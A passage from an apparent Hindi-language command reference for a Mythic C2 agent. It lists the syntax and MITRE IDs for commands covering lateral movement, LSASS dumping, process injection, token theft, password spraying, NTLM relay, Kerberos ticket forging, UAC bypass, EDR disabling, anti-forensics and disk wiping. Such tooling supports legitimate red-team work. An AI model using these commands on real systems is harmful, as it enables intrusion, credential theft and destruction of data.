हाइजैक स्कैनिंग (फैंटम DLL, लेखन योग्य PATH, KnownDLLs), टाइमस्टॉम्पिंग के साथ DLL प्लांटिंग, DLL साइडलोडिंग, PE निर्यात गणना (dll-exports DEF फ़ाइल जनरेशन के साथ), सेवा रजिस्ट्री अनुमति दुरुपयोग। लिनक्स: SUID/SGID, क्षमताएं, sudo, कंटेनर, cron हाइजैकिंग, NFS no_root_squash, systemd यूनिट, sudo टोकन, PATH हाइजैकिंग, डॉकर समूह, खतरनाक समूह, Polkit नियम, modprobe हुक, ld.so.preload इंजेक्शन, सुरक्षा मॉड्यूल (AppArmor/SELinux). macOS: LaunchDaemons, TCC, dylib हाइजैकिंग, SIP. क्रॉस-प्लेटफ़ॉर्म (T1548, T1574.001, T1574.002, T1574.009, T1574.011).
psexec | `psexec -host <target> -command <cmd> [-name <svcname>] [-cleanup <true\|false>]` or `psexec -action check -host <target>` | **(केवल विंडोज)** SCM सेवा निर्माण के माध्यम से रिमोट होस्ट पर कमांड निष्पादित करें — PSExec-शैली पार्श्व आंदोलन। `check` निष्पादित किए बिना पूर्वापेक्षाएँ मान्य करता है (SMB 445, SCM एक्सेस, एडमिन शेयर). MITRE T1021.002, T1569.002.
proc-info | `proc-info -action <info\|connections\|mounts\|modules> [-pid <PID>]` | **(केवल लिनक्स)** गहन /proc निरीक्षण: प्रक्रिया विवरण (cmdline, env, caps, cgroups, नेमस्पेस, FD), PID रिज़ॉल्यूशन के साथ नेटवर्क कनेक्शन, माउंट, कर्नेल मॉड्यूल। MITRE T1057.
process-mitigation | `process-mitigation [-action query\|set] [-pid <PID>] [-policy <policy>]` | **(केवल विंडोज)** प्रक्रिया शमन नीतियां क्वेरी या सेट करें (DEP, ASLR, CIG, ACG, CFG). अहस्ताक्षरित DLL लोडिंग को ब्लॉक करने के लिए CIG सेट करें (EDR रक्षा). MITRE T1480.
process-tree | `process-tree [-pid <PID>] [-filter <name>]` | माता-पिता-बाल संबंधों के साथ प्रक्रिया पदानुक्रम को ट्री के रूप में प्रदर्शित करें। इंजेक्शन लक्ष्य और सुरक्षा उपकरणों की पहचान करने में मदद करता है। क्रॉस-प्लेटफ़ॉर्म (T1057)।
procdump | `procdump [-action lsass\|dump\|search] [-pid <PID>]` | प्रक्रिया मेमोरी डंप करें। विंडोज: LSASS ऑटो-डिस्कवरी के साथ MiniDumpWriteDump. लिनक्स: /proc/pid/mem क्षेत्र डंपिंग. खोज क्रिया क्रेडेंशियल-धारण करने वाली प्रक्रियाएं ढूंढती है। Mythic पर अपलोड करता है और डिस्क से साफ़ करता है। MITRE T1003.001, T1003.007.
proxy-check | `proxy-check [-test_url <URL>]` | पर्यावरण चर, OS कॉन्फ़िग (रजिस्ट्री, कॉन्फ़िग फ़ाइलें), और Go ट्रांसपोर्ट से प्रॉक्सी सेटिंग्स का पता लगाएं। वैकल्पिक कनेक्टिविटी परीक्षण। क्रॉस-प्लेटफ़ॉर्म (T1016)।
ps | `ps [-filter <name>] [-pid <PID>] [-ppid <PPID>] [-user <name>] [-v]` | Mythic प्रक्रिया ब्राउज़र एकीकरण के साथ चल रही प्रक्रियाओं को सूचीबद्ध करें। नाम, PID, अभिभावक PID या उपयोगकर्ता नाम द्वारा फ़िल्टर करें। क्रॉस-प्लेटफ़ॉर्म।
ptrace-inject | `ptrace-inject -action <check\|inject> [-pid <PID>] [-filename <shellcode>] [-restore <true>] [-timeout <30>]` | **(केवल लिनक्स, amd64/arm64)** ptrace के माध्यम से प्रक्रिया इंजेक्शन — PTRACE_ATTACH/POKETEXT/SETREGS रजिस्टर और कोड रीस्टोर के साथ. Yama ptrace_scope प्री-चेक कार्रवाई योग्य मार्गदर्शन के साथ. चेक मोड ptrace_scope, क्षमताएं और उम्मीदवार रिपोर्ट करता है (T1055.008)।
pty | `pty [-shell /bin/bash] [-rows 24] [-cols 80]` | **(लिनक्स/मैकओएस)** Mythic के इंटरैक्टिव टास्किंग के माध्यम से एक इंटरैक्टिव PTY शेल सत्र शुरू करें। द्विदिश I/O के साथ पूर्ण टर्मिनल एमुलेशन (T1059)।
pwd | `pwd` | वर्तमान कार्यशील निर्देशिका प्रिंट करें।
read-memory | `read-memory <dll_name> <function_name> <start_index> <num_bytes>` | **(केवल विंडोज)** एक DLL फ़ंक्शन पते से बाइट्स पढ़ें।
reg | `reg -action <read\|write\|delete\|search\|save\|creds> [-hive HKLM] [-path ...] [...]` | **(केवल विंडोज)** एकीकृत रजिस्ट्री संचालन — पढ़ें, लिखें, हटाएं, खोजें और हाइव सहेजें (T1012, T1112, T1003.002)।
remote-reg | `remote-reg -action <query\|enum\|set\|delete> -server <host> -username <user> [-password <pass>\|-hash <NT>] [-hive HKLM] [-path ...] [-name <val>]` | SMB नेम्ड पाइप पर WinReg RPC के माध्यम से रिमोट विंडोज होस्ट पर रजिस्ट्री पढ़ें/लिखें। पास-द-हैश का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1012, T1112, T1021.002)।
remote-service | `remote-service -action <list\|query\|create\|start\|stop\|delete\|modify-path\|trigger\|dll-sideload> -server <host> -username <user> [-password <pass>\|-hash <NT>] [-name <svc>] [-binpath <path>]` | SVCCTL RPC के माध्यम से रिमोट विंडोज होस्ट पर सेवाएं प्रबंधित करें। मानक संचालन + उन्नत पार्श्व आंदोलन: modify-path (मौजूदा सेवा binpath हाइजैक), trigger (ट्रिगर-स्टार्टेड सेवा बनाएं), dll-sideload (ServiceDll रजिस्ट्री हाइजैक). पास-द-हैश. क्रॉस-प्लेटफ़ॉर्म (T1569.002, T1543.003, T1574.001)।
rev2self | `rev2self` | **(केवल विंडोज)** किसी भी सक्रिय प्रतिरूपण टोकन को छोड़ कर मूल सुरक्षा संदर्भ में वापस जाएं।
route | `route [-destination <IP>] [-gateway <IP>] [-interface <name>]` | वैकल्पिक फ़िल्टरिंग के साथ सिस्टम रूटिंग तालिका प्रदर्शित करें। विंडोज: GetIpForwardTable API, लिनक्स: /proc/net/route + IPv6, macOS: netstat -rn. क्रॉस-प्लेटफ़ॉर्म (T1016)।
rpfwd | `rpfwd start <port> <remote_ip> <remote_port>` / `rpfwd forward <port> <target_ip> <target_port> [bind_addr]` / `rpfwd stop <port>` | पोर्ट फ़ॉरवर्डिंग: रिवर्स (Mythic लक्ष्य पर रूट करता है) या फ़ॉरवर्ड (एजेंट आंतरिक लक्ष्य पर रिले करता है)। क्रॉस-प्लेटफ़ॉर्म (T1090)।
rm | `rm [-path <path>] [-secure true]` | कोई फ़ाइल या निर्देशिका हटाएं। `-secure true` फोरेंसिक पुनर्प्राप्ति को रोकने के लिए हटाने से पहले यादृच्छिक डेटा (3 पास) के साथ ओवरराइट करता है (T1070.004)।
run | `run <command>` | एक शेल कमांड निष्पादित करें और आउटपुट लौटाएं।
runas | `runas -command <cmd> -username <user> -password <pass> [-domain <domain>] [-netonly true]` | किसी भिन्न उपयोगकर्ता के रूप में एक कमांड निष्पादित करें। विंडोज: CreateProcessWithLogonW (/netonly समर्थन करता है). लिनक्स/macOS: रूट के रूप में setuid, या पासवर्ड के साथ sudo -S. क्रॉस-प्लेटफ़ॉर्म (T1134.002)।
schtask | `schtask -action <create\|query\|delete\|run\|list\|enable\|disable\|stop> -name <name> [-program <path>] [-trigger <type>] [-filter <substring>]` | निर्धारित कार्य प्रबंधित करें। विंडोज: टास्क शेड्यूलर COM API. लिनक्स: crontab, systemd टाइमर, at नौकरियां. macOS: LaunchAgents/LaunchDaemons, crontab, at. क्रॉस-प्लेटफ़ॉर्म (T1053)।
screenshot | `screenshot [-action single\|record] [-interval <sec>] [-duration <sec>] [-max_frames <n>]` | एकल स्क्रीनशॉट कैप्चर करें या अंतराल पर लगातार स्क्रीनशॉट रिकॉर्ड करें। PNG के रूप में अपलोड करता है। रिकॉर्ड मोड: कॉन्फ़िगरेबल इंटरवल/अवधि/अधिकतम फ्रेम, jobkill के माध्यम से रोकने योग्य। विंडोज: GDI. macOS: स्क्रीनकैप्चर. लिनक्स: X11/Wayland ऑटो-डिटेक्ट. क्रॉस-प्लेटफ़ॉर्म (T1113)।
secret-scan | `secret-scan [-path /home/user] [-depth 5] [-max_results 100]` | रहस्यों, API कुंजी, निजी कुंजी, कनेक्शन स्ट्रिंग और संवेदनशील पैटर्न के लिए फ़ाइलें खोजें। 42 रीजेक्स पैटर्न (AWS, GitHub, Slack, Stripe, Vault, DigitalOcean, Shopify, Databricks, New Relic, PagerDuty, Okta, Sentry, Datadog, CircleCI आदि) मूल्य रिडक्शन के साथ। गहराई-सीमित निर्देशिका चलना, शोर निर्देशिकाओं को छोड़ता है। क्रॉस-प्लेटफ़ॉर्म (T1552.001, T1005)।
secure-delete | `secure-delete [-action delete\|wipe\|wipe-mbr] -path <file_or_device> [-passes <n>] [-confirm DESTROY]` | फ़ाइलों को सुरक्षित रूप से हटाएं, डेटा मिटाएं या बूट रिकॉर्ड नष्ट करें। `delete`: यादृच्छिक ओवरराइट + हटाना। `wipe`: आक्रामक पैटर्न विनाश (T1485). `wipe-mbr`: कच्चे डिस्क डिवाइस पर MBR/GPT बूट रिकॉर्ड ओवरराइट करें (T1561). सुरक्षा गेट आवश्यक। क्रॉस-प्लेटफ़ॉर्म (T1070.004, T1485, T1561)।
security-info | `security-info [-action all\|edr\|minifilter-enum\|kernel-drivers]` | सुरक्षा स्थिति और सक्रिय नियंत्रण रिपोर्ट करें, EDR/XDR उत्पादों का पता लगाएं (20+ विक्रेता), EDR वर्गीकरण के साथ मिनीफ़िल्टर ड्राइवर गणना करें, या EDR/कॉलबैक विश्लेषण के साथ लोडेड कर्नेल ड्राइवर सूचीबद्ध करें। SELinux/AppArmor/seccomp/ASLR (लिनक्स), SIP/Gatekeeper/FileVault (macOS), Defender/UAC/Credential Guard/BitLocker (विंडोज). क्रॉस-प्लेटफ़ॉर्म (T1082, T1518.001)।
sniff | `sniff [-action capture\|poison\|relay\|ldap-relay] [-interface eth0] [-duration 30] [-response_ip <target>] [-protocols llmnr,nbtns,mdns] [-ports listen:target]` | नेटवर्क स्निफिंग, विषाक्तता और NTLM रिले। `capture`: निष्क्रिय क्रेडेंशियल निष्कर्षण (HTTP, FTP, NTLM, Kerberos, LDAP, SMTP AUTH, Telnet). `poison`: हैश कैप्चर के साथ सक्रिय रिस्पॉन्डर — हैशकैट मोड 5600 में NTLMv2 हैश। `relay`: लक्ष्य SMB के लिए NTLM रिले। `ldap-relay`: पोस्ट-प्रमाणीकरण संचालन (whoami, add-computer, RBCD, dump-laps) के साथ लक्ष्य LDAP के लिए NTLM रिले (T1040, T1557.001)।
share-hunt | `share-hunt -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-depth <n>] [-filter <all\|credentials\|configs\|code>]` | संवेदनशील फ़ाइलों — क्रेडेंशियल, कॉन्फ़िग, स्क्रिप्ट — के लिए कई होस्टों पर SMB शेयर क्रॉल करें। पास-द-हैश समर्थन के साथ पुनरावर्ती निर्देशिका खोज। क्रॉस-प्लेटफ़ॉर्म (T1135, T1039)।
smb | `smb -action <shares\|ls\|cat\|upload\|rm\|mkdir\|mv\|push\|exfil\|taint\|share-perms\|share-spider\|share-search> -host <target> -username <user> [-password <pass>] [-hash <NT hash>] [-share <name>] [-path <path>] [-depth <n>] [-extensions <.docx,.xlsx>] [-patterns <*.kdbx,web.config>] [-max_results <n>]` | रिमोट शेयरों पर SMB2 फ़ाइल संचालन — सूचीबद्ध करें, ब्राउज़ करें, पढ़ें/लिखें/हटाएं, पार्श्व उपकरण स्थानांतरण के लिए पुश करें, डेटा एक्सफिल्ट्रेशन के लिए एक्सफिल करें, फ़ाइलें रोपने के लिए टैंट करें। **share-perms**: सभी शेयरों पर पढ़ने/लिखने की पहुंच का परीक्षण करें। **share-spider**: गहराई/एक्सटेंशन फ़िल्टर के साथ पुनरावर्ती निर्देशिका सूचीकरण। **share-search**: अंतर्निहित या कस्टम पैटर्न का उपयोग करके शेयरों में संवेदनशील फ़ाइलें खोजें। NTLM प्रमाणीकरण + पास-द-हैश. क्रॉस-प्लेटफ़ॉर्म (T1021.002, T1039, T1080, T1135, T1550.002, T1570, T1048.003)।
service | `service -action <query\|start\|stop\|restart\|create\|delete\|list\|enable\|disable\|edr-enum\|edr-kill> -name <name> [-binpath <path>] [-confirm EDR-KILL]` | **(विंडोज, लिनक्स, मैकओएस)** सेवाएं प्रबंधित करें + EDR/AV लक्ष्यीकरण। `edr-enum`: स्थापित सुरक्षा सेवाओं का पता लगाएं (60+ हस्ताक्षर). `edr-kill`: पता लगाए गए EDR को रोकें+अक्षम करें (सुरक्षा गेट आवश्यक). विंडोज SCM, लिनक्स systemd, macOS launchd (T1543, T1489, T1562.001)।
setenv | `setenv -action <set\|unset> -name <NAME> [-value <VALUE>]` | एजेंट प्रक्रिया में पर्यावरण चर सेट या अनसेट करें। क्रॉस-प्लेटफ़ॉर्म।
shell-config | `shell-config -action <history\|list\|read\|inject\|remove\|clear> [-file <.bashrc>] [-line <cmd>] [-lines <count>]` | शेल हिस्ट्री पढ़ें, शेल कॉन्फ़िग फ़ाइलें सूचीबद्ध/पढ़ें/इंजेक्ट/हटाएं/साफ़ करें। लिनक्स/macOS: bashrc/zshrc. विंडोज: PowerShell प्रोफ़ाइल + PSReadLine हिस्ट्री। T1546.004/T1546.013/T1552.003/T1070.003.
sleep | `sleep [seconds] [jitter] [working_start] [working_end] [working_days]` or `sleep -interval 60 -jitter 30 -jitter_profile normal` | कॉलबैक अंतराल, जिटर, कार्य घंटे और जिटर वितरण प्रोफ़ाइल (uniform/normal/exponential) सेट करें। सामान्य वितरण अंतराल के पास क्लस्टर करता है; घातीय बर्स्टी मानव पैटर्न का अनुकरण करता है।
socks | `socks <start\|stop\|stats\|bandwidth> [port] [-bandwidth_kbs N]` | SOCKS5 प्रॉक्सी शुरू करें, रोकें, आँकड़े देखें या बैंडविड्थ सेट करें। प्रॉक्सी के माध्यम से DNS/UDP उपकरणों के लिए TCP CONNECT और UDP ASSOCIATE (RFC 1928) रिले का समर्थन करता है। वैकल्पिक प्रति-कनेक्शन बैंडविड्थ सीमा KB/s में। आँकड़े सक्रिय कनेक्शन, बाइट TX/RX, हाल का इतिहास दिखाते हैं।
sort | `sort -path <file> [-reverse true] [-numeric true] [-unique true]` | फ़ाइल की पंक्तियों को क्रमबद्ध करें। वर्णमाला, संख्यात्मक, उल्टा और अद्वितीय मोड का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1083)।
spawn | `spawn -path <exe> [-ppid <pid>] [-blockdlls true]` | **(केवल विंडोज)** इंजेक्शन के लिए एक निलंबित प्रक्रिया या थ्रेड स्पॉन करें। PPID स्पूफिंग (T1134.004) और गैर-माइक्रोसॉफ्ट DLL ब्लॉकिंग का समर्थन करता है।
spray | `spray -action <kerberos\|ldap\|smb> -server <DC> -domain <DOMAIN> -users <user1\nuser2> [-password <pass>] [-hash <NT hash>] [-delay <ms>] [-jitter <0-100>]` | केर्बेरोस प्री-प्रमाणीकरण, LDAP बाइंड या SMB प्रमाणीकरण के माध्यम से AD के विरुद्ध पासवर्ड स्प्रे। SMB पास-द-हैश का समर्थन करता है। लॉकआउट-जागरूक कॉन्फ़िगरेबल देरी/जिटर के साथ। क्रॉस-प्लेटफ़ॉर्म (T1110.003, T1550.002)।
ssh | `ssh [-action exec\|push\|check\|tunnel-local\|tunnel-remote\|tunnel-dynamic\|tunnel-list\|tunnel-stop] -host <target> -username <user> [-password <pass>] [-key_path <path>] [-command <cmd>] [-local_port <port>] [-remote_host <host>] [-remote_port <port>]` | कमांड निष्पादित करें, फ़ाइलें पुश करें, या SSH सुरंगें बनाएं। `check` SSH पूर्वापेक्षाएँ मान्य करता है (पोर्ट, प्रमाणीकरण, शेल). tunnel-local (-L), tunnel-remote (-R), tunnel-dynamic (-D SOCKS5). क्रॉस-प्लेटफ़ॉर्म (T1021.004, T1570, T1572)।
ssh-agent | `ssh-agent [-action <list\|enum>] [-socket /path/to/agent.sock]` | **(लिनक्स/मैकओएस केवल)** SSH एजेंट सॉकेट गणना करें और लोडेड कुंजियाँ सूचीबद्ध करें। SSH_AUTH_SOCK खोजता है, /tmp/ssh-*, /run/user/*, GNOME कीरिंग स्कैन करता है। क्रेडेंशियल वॉल्ट को कुंजी फिंगरप्रिंट रिपोर्ट करता है (T1552.004)।
ssh-keys | `ssh-keys -action <list\|add\|remove\|read-private\|enumerate\|generate\|find-reachable\|try-keys\|auto-move> [-key <ssh_key>] [-user <username>] [-targets <range>] [-host <ip>] [-username <user>] [-command <cmd>]` | SSH कुंजी प्रबंधन और पार्श्व आंदोलन स्वचालन। authorized_keys पढ़ें/इंजेक्ट करें, निजी कुंजी पढ़ें, कुंजी जोड़े उत्पन्न करें, SSH कॉन्फ़िग गणना करें। पार्श्व आंदोलन: find-reachable (सबनेट स्कैन), try-keys (कुंजी परीक्षण), auto-move (चेन स्कैन→प्रमाणीकरण→एक्सेक). विंडोज: PuTTY सत्र/रजिस्ट्री, .ppk कुंजी, WSL, OpenSSH, Git SSH कॉन्फ़िग. क्रॉस-प्लेटफ़ॉर्म (T1552.004, T1552.002, T1098.004, T1021.004, T1046)।
stat | `stat -path <file_or_dir>` | फ़ाइल/निर्देशिका मेटाडेटा प्रदर्शित करें: प्रकार, आकार, अनुमतियाँ, टाइमस्टैम्प। प्लेटफ़ॉर्म-विशिष्ट विवरण — inode/स्वामी (लिनक्स/मैकओएस), फ़ाइल विशेषताएँ (विंडोज). Lstat के माध्यम से सिमलिंक-जागरूक। क्रॉस-प्लेटफ़ॉर्म (T1083)।
strings | `strings -path <file> [-min_length <n>] [-pattern <text>] [-offset <bytes>] [-max_size <bytes>]` | फ़ाइलों से मुद्रण योग्य ASCII स्ट्रिंग निकालें। बाइनरी में एम्बेडेड टेक्स्ट, URL, क्रेडेंशियल खोजें। पैटर्न फ़िल्टर, न्यूनतम लंबाई नियंत्रण, ऑफ़सेट/अधिकतम आकार। क्रॉस-प्लेटफ़ॉर्म (T1005)।
start-clr | `start-clr [-action execute-assembly -assembly <b64> -arguments <args>]` | **(केवल विंडोज)** CLR v4 आरंभ करें या .NET असेंबली निष्पादित करें। `execute-assembly` क्रिया एक चरण में AMSI+ETW ऑटो-पैच करती है और असेंबली चलाती है (CS execute-assembly की तरह). बारीक नियंत्रण के लिए -amsi_patch/-etw_patch के साथ मैन्युअल मोड।
systemd-persist | `systemd-persist -action <install\|remove\|list> -name <unit> [-exec_start <cmd>] [-timer <calendar>] [-system true]` | **(केवल लिनक्स)** systemd सेवा/टाइमर स्थिरता स्थापित करें, हटाएं या सूचीबद्ध करें। उपयोगकर्ता या सिस्टम स्कोप। MITRE T1543.002.
steal-token | `steal-token -pid <pid> [-action spawn -command <cmd>]` | **(केवल विंडोज)** किसी अन्य प्रक्रिया से टोकन चुराएं: इसे प्रतिरूपित करें, या इसके साथ एक प्रक्रिया स्पॉन करें (T1134.002)।
token-store | `token-store -action <save\|list\|use\|remove\|history> -name <label>` | **(केवल विंडोज)** नामित टोकन वॉल्ट — सहेजें, सूचीबद्ध करें, पुनर्स्थापित करें, हटाएं और पहचान संक्रमण इतिहास देखें। पुनः चोरी किए बिना चुराए गए/बनाए गए पहचानों के बीच त्वरित स्विचिंग सक्षम करता है (T1134.001)।
suspend | `suspend -action <suspend\|resume> -pid <PID>` | एक प्रक्रिया को निलंबित या पुनर्स्थापित करें। संवेदनशील संचालन के दौरान सामरिक EDR/AV विराम। विंडोज: NtSuspendProcess/NtResumeProcess. लिनक्स/macOS: SIGSTOP/SIGCONT. क्रॉस-प्लेटफ़ॉर्म (T1562.001)।
sysinfo | `sysinfo [-action info\|full-profile]` | व्यापक सिस्टम जानकारी: OS संस्करण, हार्डवेयर, मेमोरी, अपटाइम, डोमेन, .NET (विंडोज), SELinux/SIP स्थिति। `full-profile` स्वचालित 5-चरण होस्ट प्रोफाइलिंग श्रृंखला चलाता है (sysinfo → ps → security-info → privesc-check → persist-enum). क्रॉस-प्लेटफ़ॉर्म (T1082)।
sysmon-config | `sysmon-config [-action check\|rules\|events]` | **(केवल विंडोज)** Sysmon स्थापना का पता लगाएं और कॉन्फ़िगरेशन निकालें — सेवा/ड्राइवर स्थिति, हैश एल्गोरिथम, विकल्प फ़्लैग, नियम डेटा आकार, ईवेंट चैनल। मिनीफ़िल्टर ऊंचाई के माध्यम से नाम बदली गई स्थापनाओं का पता लगाता है (T1518.001, T1562.001)।
tac | `tac -path <file>` | फ़ाइल पंक्तियों को उल्टे क्रम में प्रिंट करें। नवीनतम-से-सबसे पुराने लॉग देखने के लिए उपयोगी। क्रॉस-प्लेटफ़ॉर्म (T1083)।
tail | `tail -path <file> [-lines <N>] [-head true] [-bytes <N>]` | पूरी सामग्री स्थानांतरित किए बिना फ़ाइल की पहली या अंतिम N पंक्तियाँ/बाइट्स पढ़ें। कुशल टेल के लिए रिंग बफ़र, बड़ी फ़ाइलों के लिए रिवर्स-सीक। क्रॉस-प्लेटफ़ॉर्म (T1005, T1083)।
tcc-check | `tcc-check [-service <filter>]` | **(केवल मैकओएस)** TCC (पारदर्शिता, सहमति और नियंत्रण) अनुमतियाँ गणना करें। पता लगाएं कि किन ऐप्स में कैमरा, माइक्रोफोन, स्क्रीन रिकॉर्डिंग, पूर्ण डिस्क पहुंच है। अनुमत सारांश के साथ सेवा द्वारा समूहित करता है (T1082)।
touch | `touch -path <file> [-mkdir true]` | एक खाली फ़ाइल बनाएं या मौजूदा फ़ाइल टाइमस्टैम्प अपडेट करें। वैकल्पिक अभिभावक निर्देशिका निर्माण। क्रॉस-प्लेटफ़ॉर्म (T1106)।
thread-hijack | `thread-hijack -pid <PID> [-tid <TID>]` | **(विंडोज, मैकओएस)** थ्रेड निष्पादन हाइजैकिंग के माध्यम से शेलकोड इंजेक्ट करें — मौजूदा थ्रेड को निलंबित करें, PC/RIP को शेलकोड पर रीडायरेक्ट करें, फिर से शुरू करें। macOS Mach APIs (task_for_pid + thread_get/set_state) का उपयोग करता है, रूट आवश्यक (T1055.003)।
threadless-inject | `threadless-inject` | **(केवल विंडोज)** एक रिमोट प्रक्रिया में DLL फ़ंक्शन को हुक करके थ्रेडलेस इंजेक्शन का उपयोग करके शेलकोड इंजेक्ट करें। वैनिला इंजेक्शन की तुलना में अधिक गुप्त क्योंकि यह नए थ्रेड नहीं बनाता है।
ticket | `ticket -action forge\|request\|diamond\|renew\|s4u\|pkinit -realm <DOMAIN> -username <user> -key <hex_key> [-key_type aes256\|aes128\|rc4] [-format kirbi\|ccache] [-domain_sid <SID>] [-spn <SPN>] [-server <KDC>] [-impersonate <user>] [-krbtgt_key <hex>] [-target_user <user>] [-ticket <base64>] [-certificate <pem>] [-private_key <pem>]` | केर्बेरोस टिकट बनाएं, अनुरोध करें, नवीनीकृत करें, प्रतिनिधि या प्रमाणपत्र-प्रमाणीकरण करें। Forge: गोल्डन/सिल्वर टिकट (ऑफ़लाइन). Request: ओवरपास-द-हैश (ऑनलाइन). Diamond: चोरी से बचने के लिए वास्तविक AS एक्सचेंज + टिकट संशोधन। Renew: TGT जीवनकाल बढ़ाएं। S4U: S4U2Self+S4U2Proxy के माध्यम से नियंत्रित प्रतिनिधिमंडल। PKINIT: ADCS/शैडो क्रेड्स से प्रमाणपत्र-आधारित प्रमाणीकरण। क्रॉस-प्लेटफ़ॉर्म (T1558.001, T1558.002, T1550.002, T1134.001, T1649)।
tr | `tr -path <file> -from [:lower:] -to [:upper:]` | फ़ाइल सामग्री में वर्णों का अनुवाद, संपीड़न या विलोपन करें। वर्ण वर्गों और श्रेणियों का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1083)।
triage | `triage -action <all\|documents\|credentials\|configs\|database\|scripts\|archives\|mail\|recent\|custom\|recon-chain> [-path <dir>] [-hours <n>] [-target <subnet>] [-username <user>] [-password <pass>]` | एक्सफिल्ट्रेशन के लिए उच्च-मूल्य वाली फ़ाइलें खोजें — दस्तावेज़, क्रेडेंशियल, कॉन्फ़िग, डेटाबेस (.db/.sqlite), स्क्रिप्ट (.py/.sh/.ps1), आर्काइव (.zip/.tar/.7z), ईमेल फ़ाइलें (.pst/.eml/.mbox), हाल ही में संशोधित फ़ाइलें, या कस्टम पथ स्कैन। **recon-chain**: स्वचालित उपकार्य श्रृंखला — पोर्टस्कैन → SMB शेयर गणना → शेयर हंट → स्थानीय ट्राइएज (लक्ष्य, उपयोगकर्ता नाम/पासवर्ड आवश्यक). क्रॉस-प्लेटफ़ॉर्म (T1083, T1005)।
trust | `trust -server <DC> -username <user@domain> -password <pass> [-use_tls]` | LDAP के माध्यम से डोमेन/फ़ॉरेस्ट ट्रस्ट गणना करें जिसमें फ़ॉरेस्ट टोपोलॉजी, ट्रांज़िटिविटी विश्लेषण, एन्क्रिप्शन शक्ति और हमला पथ पहचान शामिल है। क्रॉस-प्लेटफ़ॉर्म (T1482)।
timestomp | `timestomp -action <get\|copy\|set\|match\|random\|clean-prefetch> -target <file> [-source <file>] [-timestamp <time>]` | फ़ाइल टाइमस्टैम्प को मिलाने के लिए संशोधित करें। प्राप्त करें, किसी अन्य फ़ाइल से कॉपी करें, विशिष्ट समय सेट करें, निर्देशिका पड़ोसियों से मिलान करें (IQR), या सीमा के भीतर यादृच्छिक। `clean-prefetch` नामित निष्पादन योग्य के लिए विंडोज प्रीफ़ेच फ़ाइलें हटाता है। विंडोज निर्माण समय भी संशोधित करता है।
tscon | `tscon [-action <list\|hijack\|disconnect\|logoff>] [-session_id <id>]` | **(केवल विंडोज)** RDP सत्र प्रबंधन — सूचीबद्ध करें, हाइजैक करें, डिस्कनेक्ट करें या लॉग ऑफ करें। बिना क्रेडेंशियल के सत्र अधिग्रहण (T1563.002)।
ts | `ts [-a] [-i PID]` | **(केवल विंडोज)** प्रक्रियाओं में थ्रेड सूचीबद्ध करें। डिफ़ॉल्ट रूप से केवल सतर्क थ्रेड (Suspended/DelayExecution) दिखाता है। सभी थ्रेड के लिए -a, PID द्वारा फ़िल्टर करने के लिए -i (T1057)।
uac-bypass | `uac-bypass [-technique fodhelper\|computerdefaults\|sdclt\|eventvwr\|silentcleanup\|cmstp\|dismhost\|wusa] [-command <path>]` | **(केवल विंडोज)** मध्यम से उच्च अखंडता तक बढ़ाने के लिए UAC बाईपास करें। 8 तकनीकें: रजिस्ट्री हाइजैक, env var हाइजैक, INF फ़ाइल दुरुपयोग, COM CLSID हाइजैक, नकली विश्वसनीय निर्देशिका। डिफ़ॉल्ट उन्नत कॉलबैक स्पॉन करता है (T1548.002, T1218.003)।
uniq | `uniq -path <file> [-count true] [-duplicate true] [-unique_only true]` | फ़ाइल में डुप्लिकेट लगातार पंक्तियों को फ़िल्टर या गिनें। काउंट मोड आवृत्ति द्वारा क्रमबद्ध करता है। क्रॉस-प्लेटफ़ॉर्म (T1083)।
unlink | `unlink -connection_id <uuid>` | एक लिंक किए गए P2P एजेंट (TCP या नेम्ड पाइप) को डिस्कनेक्ट करें। क्रॉस-प्लेटफ़ॉर्म (T1572)।
uptime | `uptime` | सिस्टम अपटाइम, बूट समय और लोड औसत दिखाएं। क्रॉस-प्लेटफ़ॉर्म (T1082)।
upload | `upload` | चंक्ड फ़ाइल स्थानांतरण के साथ लक्ष्य पर एक फ़ाइल अपलोड करें। gzip फ़ाइलों के स्वचालित डीकंप्रेसन का समर्थन करता है। SHA256 हैश सत्यापन।
usn-jrnl | `usn-jrnl -action query\|recent\|delete [-volume C:]` | **(केवल विंडोज)** NTFS USN चेंज जर्नल क्वेरी या हटाएं — एंटी-फोरेंसिक्स के लिए फ़ाइल संचालन इतिहास नष्ट करता है (T1070.004)।
vanilla-injection | `vanilla-injection -action <inject\|migrate\|ldpreload> -pid <PID>` | एक रिमोट प्रक्रिया में शेलकोड इंजेक्ट करें (inject), एजेंट माइग्रेट करें (migrate: inject + exit), या LD_PRELOAD .so के साथ नई प्रक्रिया स्पॉन करें (ldpreload: केवल लिनक्स, कोई ptrace नहीं, Yama को बायपास करता है). **विंडोज:** VirtualAllocEx/WriteProcessMemory/CreateRemoteThread. **लिनक्स (amd64/arm64):** /proc/PID/mem डायरेक्ट राइट, memfd के माध्यम से LD_PRELOAD. T1055.001, T1055.009, T1574.006.
vm-detect | `vm-detect [-action detect\|sandbox]` | VM/हाइपरवाइजर वातावरण का पता लगाएं या सैंडबॉक्स चोरी का विश्लेषण करें। `detect`: MAC OUI, DMI/SMBIOS, VM टूल, SCSI, CPU हाइपरवाइजर फ़्लैग. `sandbox`: स्कोर किया गया विश्लेषण — CPU गणना, RAM, डिस्क, अपटाइम, स्लीप टाइमिंग, होस्टनाम, प्रक्रिया गणना, उपयोगकर्ता नाम. क्रॉस-प्लेटफ़ॉर्म (T1497, T1497.001)।
vss | `vss -action <list\|create\|delete\|delete-all\|extract\|inhibit-recovery\|shutdown\|reboot> [-volume C:\\] [-id <id>] [-confirm true]` | प्रभाव तकनीकें: VSS प्रबंधन (विंडोज), पुनर्प्राप्ति निषेध (T1490), शटडाउन/रीबूट (T1529, क्रॉस-प्लेटफ़ॉर्म). विनाशकारी क्रियाओं के लिए -confirm true आवश्यक है। MITRE T1003.003, T1490, T1529.
watch-dir | `watch-dir -path <dir> [-interval 5] [-duration 300] [-depth 3] [-pattern *.docx] [-hash true]` | फ़ाइल सिस्टम परिवर्तनों के लिए एक निर्देशिका की निगरानी करें — पोलिंग के माध्यम से नई, संशोधित और हटाई गई फ़ाइलों का पता लगाता है। ग्लोब फ़िल्टरिंग और MD5 हैश डिटेक्शन का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1083, T1119)।
